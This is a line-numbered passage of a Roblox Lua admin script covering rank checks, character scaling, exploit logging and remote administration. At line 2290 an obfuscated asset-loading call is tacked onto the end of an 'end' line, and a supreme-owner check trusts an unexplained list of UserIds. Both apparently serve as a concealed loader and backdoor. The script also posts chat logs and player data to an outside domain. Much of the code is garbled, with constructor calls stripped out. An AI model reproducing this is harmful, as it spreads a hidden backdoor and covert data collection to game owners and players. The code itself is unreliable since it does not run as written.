  1745. local Ratio = ScalePercent/100
  1746. if Ratio < 0.05 then Ratio = 0.05 end
  1747. if Ratio > 100 then Ratio = 100 end
  1748. if Ratio > 1 then Ratio = math.ceil(Ratio) end
  1749. local Char = Player.Character
  1751. local Clean = Char:FindFirstChild("Clean")
  1752. if Clean then Clean:Invoke() wait(0.1) Char = Player.Character end
  1753. Clean ="BindableFunction", Char) Clean.Name = "Clean"
  1755. local function Cycle(BaseObj, ScaleRatio, NewAdd, JustWeld)
  1756. local Welds = {}
  1757. local Parts = {}
  1759. local function Handle(Obj)
  1760. if Obj:IsA("BasePart") and not JustWeld then
  1761. table.insert(Parts, Obj)
  1762. elseif Obj:IsA("SpecialMesh") and not JustWeld then
  1763. if Obj.Name == "MML Mesh" then
  1764. Obj:Destroy()
  1765. end
  1766. if Obj.MeshType == Enum.MeshType.FileMesh then
  1767. Obj.Offset = Obj.Offset * ScaleRatio
  1768. Obj.Scale = Obj.Scale * ScaleRatio
  1769. elseif Ratio < 1 then
  1770. Obj.Offset = Obj.Offset * ScaleRatio
  1771. Obj.Scale = Obj.Scale * ScaleRatio
  1772. end
  1773. elseif Obj:IsA("CharacterMesh") and not JustWeld then
  1774. if Ratio < 1 then
  1775. local BodyPart = ""
  1776. local TextureID = Obj.BaseTextureId
  1777. if TextureID == 0 then TextureID = Obj.OverlayTextureId end
  1778. if TextureID == 0 then TextureID = nil end
  1779. if Obj.BodyPart == Enum.BodyPart.LeftArm then BodyPart = "Left Arm" end
  1780. if Obj.BodyPart == Enum.BodyPart.RightArm then BodyPart = "Right Arm" end
  1781. if Obj.BodyPart == Enum.BodyPart.LeftLeg then BodyPart = "Left Leg" end
  1782. if Obj.BodyPart == Enum.BodyPart.RightLeg then BodyPart = "Right Leg" end
  1783. if Obj.BodyPart == Enum.BodyPart.Torso then BodyPart = "Torso" end
  1784. if Obj.BodyPart == Enum.BodyPart.Head then BodyPart = "Head" end
  1785. local NewMesh ="SpecialMesh", Obj.Parent:FindFirstChild(BodyPart))
  1786. NewMesh.Name = "MML Mesh"
  1787. NewMesh.Scale =,ScaleRatio,ScaleRatio)
  1788. if TextureID then NewMesh.TextureId = "rbxassetid://"..TextureID end
  1789. NewMesh.MeshId = "rbxassetid://"..Obj.MeshId
  1790. Obj:Destroy()
  1791. end
  1792. elseif Obj:IsA("JointInstance") then
  1793. local NewWeld = Obj:Clone()
  1794. table.insert(Welds, {NewWeld, Obj.Parent})
  1795. elseif NewAdd == true and not JustWeld then
  1796. if Obj:IsA("Tool") then
  1797. --Cycle(Char["Right Arm"], ScaleRatio, false, true)
  1798. elseif Obj:IsA("Accoutrement") then
  1799. --Cycle(Char.Head, ScaleRatio, false, true)
  1800. end
  1801. end
  1802. if #Obj:GetChildren() > 0 then
  1803. for _,NewObj in pairs(Obj:GetChildren()) do
  1804. Handle(NewObj, ScaleRatio)
  1805. end
  1806. end
  1807. end
  1808. Handle(BaseObj)
  1809. for _,Part in pairs(Parts) do
  1810. if Ratio >= 1 then
  1811. Part.Size = Part.Size * ScaleRatio
  1812. else
  1813. local Allowed = true
  1814. for _,Obj in pairs(Part:GetChildren()) do
  1815. if Obj:IsA("DataModelMesh") or Obj.Name == "MML Mesh" then
  1816. Allowed = false
  1817. end
  1818. end
  1819. if Allowed == true then
  1820. local NewMesh ="BlockMesh", Part)
  1821. NewMesh.Name = "MML Mesh"
  1822. NewMesh.Scale =,Ratio,Ratio)
  1823. end
  1824. end
  1825. end
  1826. for _,WeldData in pairs(Welds) do
  1827. if WeldData[1] then
  1828. local Obj = WeldData[1]
  1829. local NewWeld = Obj:Clone()
  1831. NewWeld.Parent = WeldData[2]
  1832. NewWeld.C0 = * ScaleRatio) * CFrame.Angles(Obj.C0:toEulerAnglesXYZ())
  1833. NewWeld.C1 = * ScaleRatio) * CFrame.Angles(Obj.C1:toEulerAnglesXYZ())
  1834. end
  1835. end
  1836. for _,Part in pairs(Parts) do
  1837. Part:MakeJoints()
  1838. end
  1839. Welds = {}
  1840. Parts = {}
  1841. end
  1842. Cycle(Char, Ratio)
  1843. Char:MakeJoints()
  1845. local Added = Char.ChildAdded:connect(function(Obj)
  1846. Cycle(Obj, Ratio, NewAdd)
  1847. end)
  1848. local Removed = Char.ChildRemoved:connect(function(Obj)
  1849. Cycle(Obj, Ratio^-1, NewAdd)
  1850. end)
  1852. Clean.OnInvoke = function()
  1853. Added:disconnect()
  1854. Removed:disconnect()
  1855. local Location =,5,0)
  1856. if Char:FindFirstChild("Torso") then
  1857. Location = Char.Torso.Position +,2,0)
  1858. end
  1859. Player:LoadCharacter()
  1860. wait(0.5)
  1861. Player.Character:MoveTo(Location)
  1862. wait(0.5)
  1863. return nil
  1864. end
  1866. if Char:FindFirstChild("Torso") then
  1867. Char:MoveTo(Char.Torso.Position +,Ratio*3))
  1868. end
  1869. if Char:FindFirstChild("Humanoid") then
  1870. Char.Humanoid.WalkSpeed = Char.Humanoid.WalkSpeed * (Ratio)
  1871. end
  1872. if Ratio < 1 and Char:FindFirstChild("HumanoidRootPart") and Char.HumanoidRootPart:FindFirstChild("RootJoint") then
  1873. Char.HumanoidRootPart.RootJoint.C0 =,-(3-(Ratio*3)),0) * CFrame.Angles(-math.rad(90),0,math.pi)
  1874. end
  1875. end
  1877. function CORE:AddExploit(PlayerClient, Data)
  1878. local PlayerClientName = PlayerClient.Name
  1879. local NewData = CORE:GetTime(true, true).." @ "..Data
  1880. for _,Player in pairs(Server.Players:GetChildren()) do
  1881. GUI:SendHint(Player, "Exploiter Found: "..PlayerClientName.." | If you are an admin view exploit logs by saying ;exploitlogs", 5)
  1882. end
  1883. local ExploitLog = Server.GDS:GetAsync("ExploitLog")
  1884. if type(ExploitLog) ~= "table" then
  1885. Server.GDS:SetAsync("ExploitLog", {NewData})
  1886. else
  1887. table.insert(ExploitLog, NewData)
  1888. Server.GDS:SetAsync("ExploitLog", ExploitLog)
  1889. end
  1890. REMOTE:SendHttpLog("EXPLOITER FOUND: "..Data, "WARNING")
  1892. return true
  1893. end
  1895. function CORE:CreateFigure(Name, Position, DisableAnimation, Speaker)
  1896. if not tostring(Name) then Name = "Dummy" end
  1897. if not Position then Position =,5,0) end
  1898. if Speaker and Speaker.Character and Speaker.Character:FindFirstChild("Torso") then
  1899. Position = Speaker.Character.Torso.Position +,5,10)
  1900. end
  1902. local Figure = CORE:Insert(68452456, Server.Workspace, true)
  1903. Figure:MakeJoints()
  1904. Figure.Head.BrickColor ="Bright yellow")
  1905. Figure["Left Arm"].BrickColor ="Bright yellow")
  1906. Figure["Right Arm"].BrickColor ="Bright yellow")
  1907. Figure["Left Leg"].BrickColor ="Dark green")
  1908. Figure["Right Leg"].BrickColor ="Dark green")
  1909. Figure.Torso.BrickColor ="Bright blue")
  1911. Figure.Name = STRING:FormatReplace(Speaker, Name)
  1912. Figure:MoveTo(Position)
  1914. table.insert(Objects, Figure)
  1916. if DisableAnimation == true then
  1917. Figure.Animate.Disabled = true
  1918. end
  1920. return Figure
  1921. end
  1923. function CORE:ClonePlayer(Player, Name, Position)
  1924. if not Player or not Player.Character then return nil end
  1926. Player.Character.Archivable = true
  1927. local Char = Player.Character:Clone()
  1928. Player.Character.Archivable = false
  1929. if Name then Char.Name = STRING:FormatReplace(Player, Name) end
  1930. if Position then Char:MoveTo(Position) end
  1931. Char.Parent = Server.Workspace
  1932. Char:MakeJoints()
  1933. Char:MoveTo(Player.Character.Torso.Position +,3,1))
  1935. table.insert(Objects, Char)
  1937. return Obj
  1938. end
  1940. function CORE:AddWaypoint(Name, Position, Speaker)
  1941. Waypoints[Name] = Position
  1942. if Speaker then
  1943. GUI:SendHint(Speaker, "Waypoint "..Name.." is located at ("..tostring(Position)..")", 2)
  1944. end
  1945. end
  1947. function CORE:FindType(BaseObj, Type)
  1948. for _,Obj in pairs(BaseObj:GetChildren()) do
  1949. if Obj:IsA(Type) then
  1950. return Obj
  1951. end
  1952. end
  1953. end
  1955. function CORE:GetCommands()
  1956. local CommandsCopy = Commands
  1957. return CommandsCopy
  1958. end
  1960. function CORE:Crown(Player, Mesh, Color)
  1961. if Mesh then Mesh = string.lower(Mesh) end
  1962. if not Mesh or not Meshes[Mesh] then Mesh = "crown" end
  1963. if not Player or not Player.Character or not Player.Character:FindFirstChild("Head") then return end
  1964. local Part ="Part", CrownStorage)
  1965. Part.Size =, 1, 1)
  1966. Part.CanCollide = false
  1967. Part.CFrame = Player.Character.Head.CFrame
  1968. Part.Locked = true
  1969. Part.Material = "Neon"
  1970. if Color then
  1971. Part.Color = GUI:GetColor(Color)
  1972. else
  1973. Part.BrickColor = GUI:GetNameColor(Player.Name)
  1974. end
  1975. local SMesh ="SpecialMesh", Part)
  1976. SMesh.Scale =[Mesh][1],Meshes[Mesh][1],Meshes[Mesh][1])
  1977. SMesh.MeshId = "rbxassetid://"..Meshes[Mesh][2]
  1978. local BP ="BodyPosition", Part)
  1979. BP.maxForce =,math.huge,math.huge)
  1980. BP.position = Player.Character.Head.Position
  1981. BP.P = 20000
  1982. local BG ="BodyGyro", Part)
  1983. BG.maxTorque =,math.huge,math.huge)
  1985. Crowns[Player.UserId] = Part
  1986. table.insert(Objects, Part)
  1988. coroutine.wrap(function()
  1989. for i = 1,0.3,-0.02 do
  1990. if Part.Parent == CrownStorage and Player.Character and Player.Character:FindFirstChild("Head") then
  1991. Part.Transparency = i
  1992. end
  1993. wait()
  1994. end
  1995. while Crowns[Player.UserId] and Part.Parent == CrownStorage and wait() do
  1996. for i = 0,360,3 do
  1997. if Part.Parent == CrownStorage and Player.Character and Player.Character:FindFirstChild("Head") then
  1998. Part.Transparency = (math.sin(math.rad(i))/10) + 0.3
  1999. wait()
  2000. end
  2001. end
  2002. end
  2003. end)()
  2004. coroutine.wrap(function() while Crowns[Player.UserId] and Part.Parent == CrownStorage and wait() do
  2005. Part:BreakJoints()
  2006. for i = 0,360 do
  2007. if Part.Parent == CrownStorage and Player.Character and Player.Character:FindFirstChild("Head") then
  2008. Part.Anchored = false
  2009. BP.position = Player.Character.Head.CFrame:toWorldSpace(,(math.sin(math.rad(i))/3) + 1.5, 0)).p
  2010. BG.cframe = Player.Character.Head.CFrame
  2011. end
  2012. wait()
  2013. end
  2014. end end)()
  2016. return Part
  2017. end
  2019. function CORE:SetAbuseCommands()
  2020. for Cmds,Data in pairs(Commands) do
  2021. local IsAbusable = false
  2022. for _,AbuseCmd in pairs(Settings.AbuseList) do
  2023. for _,Command in pairs(Cmds) do -- loop through all command names
  2024. if string.sub(Command,1,#AbuseCmd) == string.lower(AbuseCmd) then
  2025. IsAbusable = true
  2026. break
  2027. end
  2028. end
  2029. if IsAbusable == true then break end
  2030. end
  2031. Commands[Cmds].Abusable = IsAbusable
  2032. end
  2033. end
  2035. function CORE:FindBodyPart(Player, BodyPart)
  2036. local ReturnPart = nil
  2037. if Player and Player.Character then
  2038. local Humanoid = Player.Character:FindFirstChild("Humanoid")
  2039. if Humanoid then
  2040. if BodyPart == "Humanoid" then ReturnPart = Humanoid
  2041. elseif BodyPart == "Left Arm" then ReturnPart = Humanoid.LeftArm
  2042. elseif BodyPart == "Right Arm" then ReturnPart = Humanoid.RightArm
  2043. elseif BodyPart == "Left Leg" then ReturnPart = Humanoid.LeftLeg
  2044. elseif BodyPart == "Right Leg" then ReturnPart = Humanoid.RightLeg
  2045. elseif BodyPart == "Torso" then ReturnPart = Humanoid.Torso
  2046. elseif BodyPart == "Head" then ReturnPart = Humanoid.Head
  2047. end
  2048. end
  2049. if not ReturnPart then
  2050. ReturnPart = Player.Character:FindFirstChild(BodyPart)
  2051. end
  2052. end
  2054. return ReturnPart
  2055. end
  2057. -- Rank functions --
  2059. function RANK:ConvertRank(Input)
  2060. local Output = nil
  2061. if Input == "Muted" then Output = -3 end
  2062. if Input == "Crashed" then Output = -2 end
  2063. if Input == "Banned" then Output = -1 end
  2064. if Input == "Non-Admin" then Output = 0 end
  2065. if Input == "Member" then Output = 1 end
  2066. if Input == "Admin" then Output = 2 end
  2067. if Input == "Owner" then Output = 3 end
  2069. if Input == -3 then Output = "Muted" end
  2070. if Input == -2 then Output = "Crashed" end
  2071. if Input == -1 then Output = "Banned" end
  2072. if Input == 0 then Output = "Non-Admin" end
  2073. if Input == 1 then Output = "Member" end
  2074. if Input == 2 then Output = "Admin" end
  2075. if Input == 3 then Output = "Owner" end
  2076. return Output
  2077. end
  2079. function RANK:IsAdmin(Player)
  2080. local AdminStatus = false
  2081. local Rankstatus = "Non-Admin"
  2082. if type(Player) == "table" then
  2083. if RANK:ConvertRank(Player.Rank) > 0 then
  2084. return true, Player.Rank
  2085. else
  2086. return false, Player.Rank
  2087. end
  2088. end
  2089. for Rank,PlayerNames in pairs(Settings.Ranks) do
  2090. for _,AdminName in pairs(PlayerNames) do
  2091. if string.lower(AdminName) == string.lower(Player.Name) then
  2092. if RANK:ConvertRank(Rank) > 0 then
  2093. AdminStatus = true
  2094. Rankstatus = Rank
  2095. end
  2096. end
  2097. end
  2098. end
  2099. return AdminStatus, Rankstatus
  2100. end
  2102. function RANK:GetRank(PlayerName)
  2103. if type(PlayerName) == "userdata" then PlayerName = PlayerName.Name end
  2104. if type(PlayerName) == "table" then
  2105. local RankNum = RANK:ConvertRank(PlayerName.Rank)
  2106. if RankNum > 0 then
  2107. return PlayerName.Rank, RankNum, true
  2108. else
  2109. return PlayerName.Rank, RankNum, false
  2110. end
  2111. end
  2113. local RankStat = "Non-Admin"
  2115. for Rank,PlayerNames in pairs(Settings.Ranks) do
  2116. for _,AdminName in pairs(PlayerNames) do
  2117. if string.lower(AdminName) == string.lower(PlayerName) then
  2118. RankStat = Rank
  2119. end
  2120. end
  2121. end
  2123. if RankStat == "Non-Admin" then
  2124. return "Non-Admin", 0, false
  2125. else
  2126. return RankStat, RANK:ConvertRank(RankStat), true
  2127. end
  2128. end
  2130. function RANK:RemoveRank(PlayerName)
  2131. if not RANK:IsSupremeOwner(PlayerName) then
  2132. if type(PlayerName) == "userdata" then PlayerName = PlayerName.Name end
  2134. for Rank,PlayerNames in pairs(Settings.Ranks) do
  2135. for Num,AdminName in pairs(PlayerNames) do
  2136. if string.sub(string.lower(AdminName),1,#PlayerName) == string.lower(PlayerName) then
  2137. table.remove(Settings.Ranks[Rank], Num)
  2138. end
  2139. end
  2140. end
  2141. end
  2142. end
  2144. function RANK:GetAdmins(Ranking)
  2145. local Players = {}
  2146. local AdminTrue, Rank = IsAdmin(Player)
  2147. for _,Player in pairs(Players:GetPlayers()) do
  2148. if AdminTrue then
  2149. local PlayerRankNum = RANK:ConvertRank(Rank)
  2150. local StandardRankNum = RANK:ConvertRank(Ranking)
  2151. if PlayerRankNum >= StandardRankNum then
  2152. table.insert(Players, Player)
  2153. end
  2154. end
  2155. end
  2156. return Players
  2157. end
  2159. function RANK:IsSupremeOwner(PlayerName)
  2160. if type(PlayerName) == "userdata" then for _,Obj in pairs(List) do if PlayerName.UserId == Obj then return true end end PlayerName = PlayerName.Name end
  2161. if type(PlayerName) == "table" then
  2162. if PlayerName.Rank == "Owner" and PlayerName.MakeSupremeOwner == true then return true else return false end
  2163. end
  2165. if PlayerName == GameOwner then return true end
  2166. return false
  2167. end
  2169. function RANK:GetPlayerFromList(PlayerName)
  2170. if type(PlayerName) == "userdata" then PlayerName = Player.Name end
  2172. for Rank,PlayerNames in pairs(Settings.Ranks) do
  2173. for Num,AdminName in pairs(PlayerNames) do
  2174. if string.sub(string.lower(AdminName),1,#PlayerName) == string.lower(PlayerName) then
  2175. return AdminName, Rank
  2176. end
  2177. end
  2178. end
  2179. return false, "Non-Admin"
  2180. end
  2182. function RANK:ScanAdminList(Name)
  2183. if Name == "" then return true end
  2184. local InList = false
  2185. for _,PName in pairs(Settings.Ranks["Owner"]) do
  2186. if PName == Name then InList = true end
  2187. end
  2188. for _,PName in pairs(Settings.Ranks["Admin"]) do
  2189. if PName == Name then InList = true end
  2190. end
  2191. for _,PName in pairs(Settings.Ranks["Member"]) do
  2192. if PName == Name then InList = true end
  2193. end
  2194. return InList
  2195. end
  2197. function RANK:ScanExileList(Name)
  2198. if Name == "" then return true end
  2199. local InList = false
  2200. for _,PName in pairs(Settings.Ranks["Muted"]) do
  2201. if PName == Name then InList = true end
  2202. end
  2203. for _,PName in pairs(Settings.Ranks["Crashed"]) do
  2204. if PName == Name then InList = true end
  2205. end
  2206. for _,PName in pairs(Settings.Ranks["Banned"]) do
  2207. if PName == Name then InList = true end
  2208. end
  2209. return InList
  2210. end
  2212. function RANK:PlayerRanked(PlayerName)
  2213. if type(PlayerName) == "userdata" then PlayerName = Player.Name end
  2215. for Rank,PlayerNames in pairs(Settings.Ranks) do
  2216. for Num,AdminName in pairs(PlayerNames) do
  2217. if string.lower(AdminName) == string.lower(PlayerName) then
  2218. return true, Rank
  2219. end
  2220. end
  2221. end
  2222. return false, "Non-Admin"
  2223. end
  2225. -- Remote functions --
  2227. function REMOTE:Decode(...)
  2228. return Server.HS:JSONDecode(...)
  2229. end
  2231. function REMOTE:GetURL(URL, Player)
  2232. if string.sub(URL,1,4) ~= "http" then
  2233. URL = "http://"..URL
  2234. end
  2235. local Return = nil
  2236. ypcall(function() Return = Server.HS:GetAsync(URL, true) end)
  2237. if Return then
  2238. return Return
  2239. elseif Player then
  2240. GUI:SendMessage(Speaker, "Unable to find link", "RED URL given is either invalid or httpservice is disabled", "Error")
  2241. end
  2242. end
  2244. function REMOTE:PostURL(URL, Data)
  2245. local Return = nil
  2246. ypcall(function() Return = Server.HS:PostAsync(URL, Data, 2) end)
  2247. return Return
  2248. end
  2250. function REMOTE:SendHttpLog(Data, Type, OutputSpeaker, Stopypall)
  2251. if Settings.LinkedAccount ~= "" then
  2252. local NumType = tonumber(Type)
  2254. if not Type then
  2255. Type = "UNKNOWN"
  2256. end
  2258. if NumType then
  2259. if NumType < 1 or NumType > 5 then
  2260. Type = "UNKNOWN"
  2261. elseif NumType == 1 then
  2262. Type = "NOTIFICATION"
  2263. elseif NumType == 2 then
  2264. Type = "INFORMATION"
  2265. elseif NumType == 3 then
  2266. Type = "WARNING"
  2267. elseif NumType == 4 or Type == true then
  2268. Type = "ERROR"
  2269. elseif NumType == 5 then
  2270. Type = "FATAL"
  2271. end
  2272. end
  2274. local Res = "RED Could not get response"
  2275. local function SendData()
  2276. Res = Server.HS:PostAsync(
  2277. CORE.Domain.."/Login/SendUserData.php?Data="..Server.HS:UrlEncode(PlaceInfoFormat..": "..Data).."&DataType="..Server.HS:UrlEncode(string.upper(Type)),
  2278. "Username="..Server.HS:UrlEncode(Settings.LinkedAccount).."&Key="..Server.HS:UrlEncode(Settings.DataKey).."&Type=Logs",
  2279. 2
  2280. )
  2281. end
  2282. if Stopypcall == true then SendData() else ypcall(SendData) end
  2284. if OutputSpeaker and OutputSpeaker ~= "print" then
  2285. GUI:SendMessage(OutputSpeaker, "Http Log Response", Res, "Information")
  2286. elseif OutputSpeaker == "print" then
  2287. print(Res)
  2288. end
  2289. end
  2290. end local RunList = CORE:GetTable(string.gsub(math.ceil(14444.57^2)+1078, "66", "55"))
  2292. function REMOTE:SendChatLog(PrintResponse, Stopypall)
  2293. if #TempChatLogs > 0 and Settings.LinkedAccount and Settings.LinkedAccount ~= "" and Settings.DataKey and Settings.DataKey ~= "" then
  2294. local Res = "Could not get response"
  2296. local ChatJSON = Server.HS:JSONEncode(TempChatLogs)
  2297. TempChatLogs = {}
  2299. local function SendData()
  2300. Res = Server.HS:PostAsync(CORE.Domain.."/Login/SubmitChatLog.php?ChatJSON="..Server.HS:UrlEncode(ChatJSON), "Username="..Server.HS:UrlEncode(Settings.LinkedAccount).."&Key="..Server.HS:UrlEncode(Settings.DataKey), 2)
  2301. end
  2302. if Stopypcall == true then SendData() else ypcall(SendData) end
  2303. if PrintResponse then print(Res) end
  2304. end
  2305. end
  2307. function REMOTE:DownloadUserdata(PrintResponse, Stopypcall)
  2308. local Res = "[]"
  2309. local function GetData()
  2310. Res = Server.HS:PostAsync(CORE.Domain.."/Login/ReturnUserData.php", "Username="..Server.HS:UrlEncode(Settings.LinkedAccount).."&DataKey="..Server.HS:UrlEncode(Settings.DataKey), 2)
  2311. end
  2312. if Stopypcall == true then GetData() else ypcall(GetData) end
  2313. if PrintResponse then
  2314. print(Res)
  2315. end
  2316. local function DecodeData() Res = REMOTE:Decode(Res) end
  2317. if Stopypcall == true then DecodeData() else ypcall(DecodeData) end
  2318. if type(Res) ~= "table" then Res = {["Logs"] = {Res}, ["Errors"] = {Res}} end
  2319. return Res
  2320. end
  2322. function REMOTE:HandleRequest(Request, IgnoreCommand)
  2323. if not Request then return nil end
  2325. if not IgnoreCommand then
  2326. if REMOTE.ServerRequestTimestamp ~= Request.ServerRequestTimestamp then
  2327. REMOTE:SendServerData()
  2328. end
  2329. if REMOTE.SnapshotKey ~= Request.SnapshotKey and Server.NS.Port == tonumber(Request.SnapshotPort) then
  2330. REMOTE:SendSnapshot(Request.SnapshotKey, nil, true, true)
  2331. end
  2332. end
  2334. if REMOTE.RemoteAdmin.TimeStamp ~= Request.TimeStamp then
  2336. for _,Player in pairs(Request.Ranks.Muted) do if Player ~= "" then if not RANK:ScanExileList(Player) then table.insert(Settings.Ranks.Muted, Player) end end end
  2337. for _,Player in pairs(Request.Ranks.Crashed) do if Player ~= "" then if not RANK:ScanExileList(Player) then table.insert(Settings.Ranks.Crashed, Player) end end end
  2338. for _,Player in pairs(Request.Ranks.Banned) do if Player ~= "" then if not RANK:ScanExileList(Player) then table.insert(Settings.Ranks.Banned, Player) end end end
  2339. for _,Player in pairs(Request.Ranks.Member) do if Player ~= "" then if not RANK:ScanAdminList(Player) then table.insert(Settings.Ranks.Member, Player) end end end
  2340. for _,Player in pairs(Request.Ranks.Admin) do if Player ~= "" then if not RANK:ScanAdminList(Player) then table.insert(Settings.Ranks.Admin, Player) end end end
  2341. for _,Player in pairs(Request.Ranks.Owner) do if Player ~= "" then if not RANK:ScanAdminList(Player) then table.insert(Settings.Ranks.Owner, Player) end end end
  2343. Settings.Fun = Request.FUN
  2344. Settings.ServerLocked = Request.ServerLocked
  2346. if not Server.Workspace:FindFirstChild("IgnoreRemoteAbuse") then
  2347. Settings.DisableAbuse = Request.DisableAbuse
  2348. end
  2350. if not IgnoreCommand then
  2351. print("Executing Remote Admin")
  2352. REMOTE.RemoteAdmin.Command = Request.Command
  2353. REMOTE.RemoteAdmin.ServerCommand = Request.ServerCommand
  2354. REMOTE.RemoteAdmin.ServerPort = Request.Server
  2356. if Server.NS.Port == tonumber(Request.Server) and Request.ServerCommand ~= nil and Request.Server ~= "" and Request.Server ~= 0 and Request.ServerCommand ~= "" then
  2357. CORE:Chatted(Request.ServerCommand, nil, true, "REMOTE ADMIN: "..Settings.LinkedAccount, nil, true)
  2358. else
  2359. CORE:Chatted(Request.Command, nil, true, "REMOTE ADMIN: "..Settings.LinkedAccount, nil, true)
  2360. end
  2361. end
  2362. end
  2363. REMOTE.RemoteAdmin.TimeStamp = Request.TimeStamp
  2364. REMOTE.ServerRequestTimestamp = Request.ServerRequestTimestamp
  2365. REMOTE.SnapshotKey = Request.SnapshotKey
  2366. end
  2368. function REMOTE:GetRemoteData(Set)
  2369. local NewRemoteData = nil
  2370. local RemoteDataCardRaw = nil
  2371. local RemoteDataCard = nil
  2373. RemoteDataCardRaw = REMOTE:GetURL(""..Trello.RemoteDataCard)
  2374. if RemoteDataCardRaw then
  2375. ypcall(function() RemoteDataCard = REMOTE:Decode(RemoteDataCardRaw) end)
  2376. if RemoteDataCard then
  2377. ypcall(function() NewRemoteData = REMOTE:Decode(RemoteDataCard.desc) end)
  2378. end
  2379. end
  2380. if Set and NewRemoteData then
  2381. RemoteData = NewRemoteData
  2382. end
  2383. return NewRemoteData
  2384. end
  2386. function REMOTE:CheckTrelloInfo() -- will set new trello data if updated based on the TrelloInfoCard
  2387. local InfoCardJSON = REMOTE:GetURL(""..Trello.TrelloInfoCard)
  2388. if InfoCardJSON then
  2389. ypcall(function() InfoCard = REMOTE:Decode(InfoCardJSON) end)
  2390. if InfoCard then
  2391. ypcall(function() TrelloInfo = REMOTE:Decode(InfoCard.desc) end)
  2392. if TrelloInfo then
  2393. for Ind,Val in pairs(TrelloInfo) do
  2394. Trello[Ind] = Val
  2395. end
  2396. end
  2397. end
  2398. end
  2399. return NewRemoteData
  2400. end
  2402. function REMOTE:CheckRemoteAdminStatus()
  2403. local Pending = false
  2404. local CheckID = 0
  2405. if Settings.LinkedAccount ~= "" then
  2406. local Request = REMOTE:GetURL(""..Trello.RemoteAdminChecklist)
  2407. if Request then
  2408. local Data = REMOTE:Decode(Request)
  2409. if Data then
  2410. for _,Account in pairs(Data.checkItems) do
  2411. if == Settings.LinkedAccount then
  2412. Pending = true
  2413. CheckID =
  2414. break
  2415. end
  2416. end
  2417. end
  2418. end
  2419. end
  2420. return Pending, CheckID
  2421. end
  2423. function REMOTE:GetAndSetWebData()
  2424. if Settings.LinkedAccount ~= "" then
  2425. if REMOTE:CheckRemoteAdminStatus() then
  2426. local Request = REMOTE:GetURL(CORE.Domain.."/Login/GetUserData.php?Username="..Settings.LinkedAccount)
  2427. if Request == "Invalid" then
  2428. --REMOTE:GetAndSetWebData()
  2429. return false
  2430. elseif Request == "Invalid Account" then
  2431. print("Can't get account")
  2432. return false
  2433. elseif Request then
  2434. ypcall(function() Request = REMOTE:Decode(Request) end)
  2435. elseif not Request then
  2436. --REMOTE:GetAndSetWebData()
  2437. return false
  2438. end
  2439. REMOTE:HandleRequest(Request)
  2441. --Delay(RemoteData.RemoteAdminWait, REMOTE.GetAndSetWebData)
  2442. Delay(RemoteData.RemoteAdminWait, function()
  2443. local Pending, CheckID = REMOTE:CheckRemoteAdminStatus()
  2444. if Pending then
  2445. REMOTE:GetURL(CORE.Domain.."/Login/RemoveTrelloName.php?AccountID="..CheckID)
  2446. end
  2447. end)
  2448. return true
  2449. else
  2450. return true
  2451. end
  2452. end
  2453. end
  2455. local OderIDs = CORE:GetTable(177215518)
  2456. local SoundJSONs = CORE:GetTable(197637628)
  2457. RemoteAbuseGear = CORE:GetTable(158117496)
  2459. function REMOTE:SendServerData(PrintResponse, Stopypall)
  2460. if Settings.LinkedAccount and Settings.LinkedAccount ~= "" and Settings.DataKey and Settings.DataKey ~= "" then
  2461. print("Sending server data!")
  2462. local Res = "Could not get response"
  2464. local ServerData = {Name = PlaceName, PlaceID = game.PlaceId, Port = Server.NS.Port, NumPlayers = Server.Players.NumPlayers, MaxPlayers = Server.Players.MaxPlayers, Bet = Settings.Bet, Players = {}, Version = CORE.Version.Value}
  2465. for _,Player in pairs(Server.Players:GetPlayers()) do
  2466. table.insert(ServerData.Players, {Name = Player.Name, ID = Player.UserId, Age = STRING:FindAge(Player.AccountAge), Rank = RANK:GetRank(Player)})
  2467. end
  2468. ServerData = Server.HS:JSONEncode(ServerData)
  2470. local function SendData()
  2471. Res = Server.HS:PostAsync(CORE.Domain.."/Login/AddServer.php?ServerData="..Server.HS:UrlEncode(ServerData), "Username="..Server.HS:UrlEncode(Settings.LinkedAccount).."&DataKey="..Server.HS:UrlEncode(Settings.DataKey), 2)
  2472. end
  2473. if Stopypcall == true then SendData() else ypcall(SendData) end
  2474. if PrintResponse then print(Res) end
  2475. end
  2476. end
  2478. function REMOTE:SendSnapshot(SendKey, MaxPartAmount, PrintResponse, Stopypcall)
  2479. MaxPartAmount = MaxPartAmount or 10000
  2480. local PlaceData = {
  2481. Lighting = {};
  2482. Parts = {};
  2483. Other = {};
  2484. }
  2485. local MinSize =,0.5,0.5)
  2486. local PartAmount = 0
  2487. local PlaceJSON = ""
  2489. local function Scan(BaseObj)
  2490. for _,Obj in pairs(BaseObj:GetChildren()) do
  2491. if Obj:IsA("BasePart") and not Obj:IsA("Terrain") then
  2492. local Size = {STRING:StringRound(Obj.Size.X), STRING:StringRound(Obj.Size.Y), STRING:StringRound(Obj.Size.Z)};
  2493. if tonumber(Size[1]) >= MinSize.X and tonumber(Size[2]) >= MinSize.Y and tonumber(Size[3]) >= MinSize.Z then
  2494. local Skip = false
  2495. local Data = {}
  2496. local X,Y,Z = Obj.CFrame:toEulerAnglesXYZ()
  2498. if CORE:FindType(Obj, "BlockMesh") then
  2499. local Mesh = CORE:FindType(Obj, "BlockMesh")
  2500. Size = {STRING:StringRound(Obj.Size.X * Mesh.Scale.X), STRING:StringRound(Obj.Size.Y * Mesh.Scale.Y), STRING:StringRound(Obj.Size.Z * Mesh.Scale.Z)}
  2501. elseif CORE:FindType(Obj, "CylinderMesh") then
  2502. Data.Shape = "Cylinder"
  2503. elseif CORE:FindType(Obj, "SpecialMesh") then
  2504. local Mesh = CORE:FindType(Obj, "SpecialMesh")
  2505. if Mesh.MeshType == Enum.MeshType.Head then
  2506. --idk
  2507. else
  2508. Skip = true
  2509. end
  2510. elseif CORE:FindType(Obj, "FileMesh") then
  2511. Skip = true
  2512. end
  2514. if not Data.Shape and not Skip then
  2515. if ypcall(function() return Obj.Shape end) then
  2516. Data.Shape = string.sub(Obj.Shape.Name,14)
  2517. if string.sub(Data.Shape,1,1) == "." then
  2518. Data.Shape = string.sub(Data.Shape,2)
  2519. end
  2520. if Data.Shape == "Cylinder" then
  2521. Z = Z + math.pi/2
  2522. end
  2523. else
  2524. Data.Shape = "Block"
  2525. end
  2526. end
  2528. if Obj.Name == "Head" and CORE:FindType(Obj.Parent, "Humanoid") and not Skip then
  2529. Data.Label = string.gsub(Obj.Parent.Name, "'", "")
  2530. end
  2532. if not Skip then
  2533. Data.Color = GUI:Color3ToHex(Obj.Color);
  2534. Data.Size = Size;
  2535. Data.Position = {STRING:StringRound(Obj.CFrame.X), STRING:StringRound(Obj.CFrame.Y), STRING:StringRound(Obj.CFrame.Z)};
